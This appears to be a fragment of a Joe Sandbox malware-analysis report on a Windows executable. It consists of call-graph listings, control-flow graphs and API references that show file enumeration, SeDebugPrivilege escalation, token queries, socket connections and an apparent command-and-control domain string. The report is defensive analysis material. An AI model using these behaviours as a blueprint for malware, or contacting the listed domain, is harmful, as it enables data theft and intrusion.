9255 405695 2 API calls 9254->9255 9255->9256 9256->9237 9258 4031e5 4 API calls 9257->9258 9259 4049c6 9258->9259 9259->9246 9259->9247 9260 4139de 9269 413855 9260->9269 9262 4139f1 9263 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9262->9263 9264 4139f7 9263->9264 9265 413866 58 API calls 9264->9265 9266 413a2d 9265->9266 9267 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9266->9267 9268 413a34 9267->9268 9270 4031e5 4 API calls 9269->9270 9271 413864 9270->9271 9271->9271 9938 4116e7 9939 4117ba 9938->9939 9940 4117f1 9939->9940 9941 405b6f 6 API calls 9939->9941 9942 4117d0 9941->9942 9942->9940 9943 404cbf 8 API calls 9942->9943 9944 4117eb 9943->9944 9945 402bab 2 API calls 9944->9945 9945->9940 9291 4094e7 9292 404b22 6 API calls 9291->9292 9293 4094fe 9292->9293 9294 409554 9293->9294 9295 405b6f 6 API calls 9293->9295 9296 409514 9295->9296 9297 404b22 6 API calls 9296->9297 9303 40954d 9296->9303 9299 40952d 9297->9299 9298 402bab 2 API calls 9298->9294 9300 409408 15 API calls 9299->9300 9305 409544 9299->9305 9302 40953e 9300->9302 9301 402bab 2 API calls 9301->9303 9304 402bab 2 API calls 9302->9304 9303->9298 9304->9305 9305->9301 9314 4058ea 9315 4031e5 4 API calls 9314->9315 9316 4058fd StrStrA 9315->9316 9990 40d4ea 9991 404bee 6 API calls 9990->9991 9992 40d500 9991->9992 9993 40d5a0 9992->9993 9994 404bee 6 API calls 9992->9994 9995 40d529 9994->9995 9996 404bee 6 API calls 9995->9996 9997 40d537 9996->9997 9998 404bee 6 API calls 9997->9998 9999 40d546 9998->9999 9999->9993 10000 405872 4 API calls 9999->10000 10001 40d56d 10000->10001 10002 405872 4 API calls 10001->10002 10003 40d57c 10002->10003 10004 405872 4 API calls 10003->10004 10005 40d58e 10004->10005 10006 405872 4 API calls 10005->10006 10006->9993 10007 40a3ea 10008 40374e 6 API calls 10007->10008 10010 40a403 10008->10010 10009 40a419 10010->10009 10011 4059d8 4 API calls 10010->10011 10012 40a411 10011->10012 10013 402bab 2 API calls 10012->10013 10013->10009 9354 404df3 WSAStartup 9358 4091f6 9359 404b22 6 API calls 9358->9359 9360 40920b 9359->9360 9361 409222 9360->9361 9362 409408 15 API calls 9360->9362 9363 40921c 9362->9363 9364 402bab 2 API calls 9363->9364 9364->9361 10040 4117fe 10041 404c4e 6 API calls 10040->10041 10042 411888 10041->10042 10043 404c4e 6 API calls 10042->10043 10048 411925 10042->10048 10044 4118ab 10043->10044 10044->10048 10059 4119b3 10044->10059 10046 4118c5 10047 4119b3 4 API calls 10046->10047 10049 4118d0 10047->10049 10049->10048 10050 4056bf 2 API calls 10049->10050 10051 4118fd 10050->10051 10052 405872 4 API calls 10051->10052 10053 41190a 10052->10053 10054 405872 4 API calls 10053->10054 10055 411915 10054->10055 10056 413aca 4 API calls 10055->10056 10057 41191f 10056->10057 10058 405695 2 API calls 10057->10058 10058->10048 10060 4119c6 10059->10060 10062 4119bf 10059->10062 10061 4031e5 4 API calls 10060->10061 10061->10062 10062->10046 9368 40e880 9369 41219c 14 API calls 9368->9369 9370 40e88e 9369->9370 9371 41219c 14 API calls 9370->9371 9372 40e89c 9371->9372 10068 40e48a 10069 404bee 6 API calls 10068->10069 10070 40e4d0 10069->10070 10071 40e4f4 10070->10071 10072 405872 4 API calls 10070->10072 10072->10071 9469 410390 9470 404b22 6 API calls 9469->9470 9471 4103a5 9470->9471 9472 405b6f 6 API calls 9471->9472 9475 410409 9471->9475 9478 4103ba 9472->9478 9473 410402 9474 402bab 2 API calls 9473->9474 9474->9475 9476 4103fb 9477 402bab 2 API calls 9476->9477 9477->9473 9478->9473 9478->9476 9479 403d74 19 API calls 9478->9479 9480 4103ee 9479->9480 9480->9476 9481 402bab 2 API calls 9480->9481 9481->9476 10083 40ed96 10084 4040bb 12 API calls 10083->10084 10098 40edb0 10084->10098 10085 40ef90 10086 40ef87 10087 403f9e 5 API calls 10086->10087 10087->10085 10088 405ae9 6 API calls 10088->10098 10089 412269 6 API calls 10089->10098 10090 40ef61 10091 40ef6e 10090->10091 10093 402bab 2 API calls 10090->10093 10094 40ef7c 10091->10094 10095 402bab 2 API calls 10091->10095 10092 402bab GetProcessHeap HeapFree 10092->10098 10093->10091 10094->10086 10096 402bab 2 API calls 10094->10096 10095->10094 10096->10086 10097 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10097->10098 10098->10085 10098->10086 10098->10088 10098->10089 10098->10090 10098->10092 10098->10097 10099 40ef98 10100 404c4e 6 API calls 10099->10100 10101 40efb6 10100->10101 10113 40f02a 10101->10113 10114 40f054 10101->10114 10104 404bee 6 API calls 10105 40efda 10104->10105 10106 404bee 6 API calls 10105->10106 10107 40efe9 10106->10107 10108 405872 4 API calls 10107->10108 10107->10113 10109 40f008 10108->10109 10110 405872 4 API calls 10109->10110 10111 40f01a 10110->10111 10112 405872 4 API calls 10111->10112 10112->10113 10115 40f064 10114->10115 10116 402b7c 2 API calls 10115->10116 10118 40f072 10116->10118 10117 40efca 10117->10104 10118->10117 10120 405ecd 10118->10120 10121 4059b8 4 API calls 10120->10121 10122 405edf 10121->10122 10122->10118 9488 410c98 9489 41219c 14 API calls 9488->9489 9490 410ca8 9489->9490 9491 41219c 14 API calls 9490->9491 9492 410cb5 9491->9492 9493 412093 20 API calls 9492->9493 9494 410cc9 9493->9494 10192 41249c 10193 4056bf 2 API calls 10192->10193 10194 4124aa 10193->10194 10195 4057df 13 API calls 10194->10195 10200 4124ce 10194->10200 10196 4124be 10195->10196 10197 413aca 4 API calls 10196->10197 10198 4124c8 10197->10198 10199 405695 2 API calls 10198->10199 10199->10200 9498 40f49e 9499 40f4b6 13 API calls 9498->9499 9500 40f4a8 9499->9500 9501 40929e 9502 413b28 6 API calls 9501->9502 9503 4092a4 9502->9503 9504 405b6f 6 API calls 9503->9504 9505 4092af 9504->9505 9506 409408 15 API calls 9505->9506 9509 4092c5 9505->9509 9507 4092bf 9506->9507 9508 402bab 2 API calls 9507->9508 9508->9509 10219 407fa4 10220 407fb7 10219->10220 10221 402b7c 2 API calls 10220->10221 10222 407fee 10220->10222 10223 40800d 10221->10223 10223->10222 10224 4037be 4 API calls 10223->10224 10225 40803c 10224->10225 10226 402bab 2 API calls 10225->10226 10226->10222 9546 4090aa 9547 404b22 6 API calls 9546->9547 9548 4090c1 9547->9548 9549 4090d8 9548->9549 9550 409408 15 API calls 9548->9550 9551 404b22 6 API calls 9549->9551 9552 4090d2 9550->9552 9553 4090eb 9551->9553 9554 402bab 2 API calls 9552->9554 9555 408c4d 15 API calls 9553->9555 9558 409104 9553->9558 9554->9549 9556 4090fe 9555->9556 9557 402bab 2 API calls 9556->9557 9557->9558 9565 409cae 9580 404b79 9565->9580 9567 409cc5 9568 409d27 9567->9568 9570 405b6f 6 API calls 9567->9570 9571 409d2f 9567->9571 9569 402bab 2 API calls 9568->9569 9569->9571 9572 409cec 9570->9572 9572->9568 9573 404b79 6 API calls 9572->9573 9574 409d05 9573->9574 9575 409d1e 9574->9575 9576 408c4d 15 API calls 9574->9576 9577 402bab 2 API calls 9575->9577 9578 409d18 9576->9578 9577->9568 9579 402bab 2 API calls 9578->9579 9579->9575 9581 404b22 6 API calls 9580->9581 9582 404b8a 9581->9582 9582->9567 10286 411fb3 10287 405b6f 6 API calls 10286->10287 10288 412013 10287->10288 10289 41206a 10288->10289 10292 412075 10288->10292 10305 411a8d 10288->10305 10291 402bab 2 API calls 10289->10291 10291->10292 10294 4056bf 2 API calls 10295 41203d 10294->10295 10296 405872 4 API calls 10295->10296 10297 41204a 10296->10297 10298 413aca 4 API calls 10297->10298 10299 412054 10298->10299 10300 405695 2 API calls 10299->10300 10301 41205a 10300->10301 10302 413a58 13 API calls 10301->10302 10303 412064 10302->10303 10304 402bab 2 API calls 10303->10304 10304->10289 10306 402b7c 2 API calls 10305->10306 10307 411aa3 10306->10307 10324 411f05 10307->10324 10328 404ada 10307->10328 10310 404ada 4 API calls 10311 411cad 10310->10311 10312 411f0c 10311->10312 10313 411cc0 10311->10313 10314 402bab 2 API calls 10312->10314 10331 405eb6 10313->10331 10314->10324 10316 411d3c 10317 4031e5 4 API calls 10316->10317 10326 411d7b 10317->10326 10318 411ea6 10319 4031e5 4 API calls 10318->10319 10320 411eb5 10319->10320 10321 4031e5 4 API calls 10320->10321 10322 411ed6 10321->10322 10323 405eb6 4 API calls 10322->10323 10323->10324 10324->10289 10324->10294 10325 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10325->10326 10326->10318 10326->10325 10327 405eb6 4 API calls 10326->10327 10327->10326 10329 4031e5 4 API calls 10328->10329 10330 404afd 10329->10330 10330->10310 10332 405998 4 API calls 10331->10332 10333 405ec8 10332->10333 10333->10316 9612 40f6b8 9613 41219c 14 API calls 9612->9613 9614 40f6c7 9613->9614 9615 41219c 14 API calls 9614->9615 9616 40f6d5 9615->9616 9617 41219c 14 API calls 9616->9617 9618 40f6df 9617->9618 9637 40d6bd 9638 4056bf 2 API calls 9637->9638 9639 40d6c9 9638->9639 9650 404cbf 9639->9650 9642 404cbf 8 API calls 9643 40d6f4 9642->9643 9644 404cbf 8 API calls 9643->9644 9645 40d702 9644->9645 9646 413aca 4 API calls 9645->9646 9647 40d711 9646->9647 9648 405695 2 API calls 9647->9648 9649 40d71f 9648->9649 9651 402b7c 2 API calls 9650->9651 9652 404ccd 9651->9652 9653 404ddc 9652->9653 9654 404b8f 5 API calls 9652->9654 9653->9642 9655 404ce4 9654->9655 9656 404dd4 9655->9656 9658 402b7c 2 API calls 9655->9658 9657 402bab 2 API calls 9656->9657 9657->9653 9665 404d04 9658->9665 9659 404dcc 9660 404a39 5 API calls 9659->9660 9660->9656 9661 404dc6 9662 402bab 2 API calls 9661->9662 9662->9659 9663 402b7c 2 API calls 9663->9665 9664 404b8f 5 API calls 9664->9665 9665->9659 9665->9661 9665->9663 9665->9664 9666 404a39 5 API calls 9665->9666 9667 405b6f 6 API calls 9665->9667 9668 404cbf 8 API calls 9665->9668 9669 402bab GetProcessHeap HeapFree 9665->9669 9666->9665 9667->9665 9668->9665 9669->9665 9670 40f0bf 9671 4056bf 2 API calls 9670->9671 9672 40f0c9 9671->9672 9674 404cbf 8 API calls 9672->9674 9682 40f115 9672->9682 9673 41219c 14 API calls 9675 40f128 9673->9675 9676 40f0ed 9674->9676 9677 404cbf 8 API calls 9676->9677 9678 40f0fb 9677->9678 9679 413aca 4 API calls 9678->9679 9680 40f10a 9679->9680 9681 405695 2 API calls 9680->9681 9681->9682 9682->9673

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 155 403f97-403f9d 152->155 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 168 403e12-403e22 call 405d24 167->168 169 403de4-403df9 call 405eff 167->169 189 403e30-403e4c call 405b6f 168->189 190 403e24-403e2e 168->190 169->166 186 403dfb-403e10 call 405eff 169->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->168 189->166 204 403e4e-403e6f call 403d74 call 402bab 189->204 190->166 190->189 193->162 205 403f8d 196->205 197->159 202 403f75-403f85 call 402bab call 403bef 199->202 203 403f35-403f36 call 40fa23 199->203 202->155 209 403f39-403f40 call 402bab 203->209 204->166 217 403f63-403f73 call 402bab call 403bef 204->217 205->160 209->181 217->155
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                                            • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileFind$FirstNext
                                                            • String ID: %s\%s$%s\*$Program Files$Windows
                                                            • API String ID: 1690352074-2009209621
                                                            • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                            • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                                            • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                                            • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                                            • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                                            • String ID: SeDebugPrivilege
                                                            • API String ID: 3615134276-2896544425
                                                            • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                            • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                                            • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                                            • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID:
                                                            • API String ID: 1357844191-0
                                                            • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                            • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                                            • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                                            • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                                            APIs
                                                            • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID:
                                                            • API String ID: 1507349165-0
                                                            • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                            • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                            • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                            • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 263 406320-406326 call 402bab 261->263 264 406327 261->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                                            • _wmemset.LIBCMT ref: 00406244
                                                            • _wmemset.LIBCMT ref: 00406261
                                                            • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _wmemset$ErrorInformationLastToken
                                                            • String ID: IDA$IDA
                                                            • API String ID: 487585393-2020647798
                                                            • Opcode ID: 1dae284ec7aa54d6a8d1213654802f17282482a61951f49c161b5c3b2de02155
                                                            • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                                            • Opcode Fuzzy Hash: 1dae284ec7aa54d6a8d1213654802f17282482a61951f49c161b5c3b2de02155
                                                            • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                                                            APIs
                                                            • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                                            • socket.WS2_32(?,?,?), ref: 00404E7A
                                                            • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: freeaddrinfogetaddrinfosocket
                                                            • String ID:
                                                            • API String ID: 2479546573-0
                                                            • Opcode ID: 8b3f5aaad329952e7ceb99c6b490e01b4fa6f2d39085f40df109be46110acc21
                                                            • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                                            • Opcode Fuzzy Hash: 8b3f5aaad329952e7ceb99c6b490e01b4fa6f2d39085f40df109be46110acc21
                                                            • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                                            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$AllocCreateReadVirtual
                                                            • String ID: .tmp
                                                            • API String ID: 3585551309-2986845003
                                                            • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                            • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                                            • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                                            • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                                            • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                                            • GetLastError.KERNEL32 ref: 0041399E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Error$CreateLastModeMutex
                                                            • String ID:
                                                            • API String ID: 3448925889-0
                                                            • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                            • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                                            • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                                            • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                                            • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CreatePointerWrite
                                                            • String ID:
                                                            • API String ID: 3672724799-0
                                                            • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                            • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                                            • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                                            • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                                              • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                                              • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                              • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$CreateFreeProcessThread_wmemset
                                                            • String ID: ckav.ru
                                                            • API String ID: 2915393847-2696028687
                                                            • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                            • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                                            • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                                            • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                                            APIs
                                                              • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                              • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                            • _wmemset.LIBCMT ref: 0040634F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess_wmemset
                                                            • String ID: CA
                                                            • API String ID: 2773065342-1052703068
                                                            • Opcode ID: 3fdcce989f46bcb3974c0fccb8cb8e604f0ebb2ab5075b70951c1ede03fd28a8
                                                            • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                                            • Opcode Fuzzy Hash: 3fdcce989f46bcb3974c0fccb8cb8e604f0ebb2ab5075b70951c1ede03fd28a8
                                                            • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                                            APIs
                                                            • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.2658959804.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_400000_screens.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InformationToken
                                                            • String ID: IDA
                                                            • API String ID: 4114910276-365204570
                                                            • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                                            • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
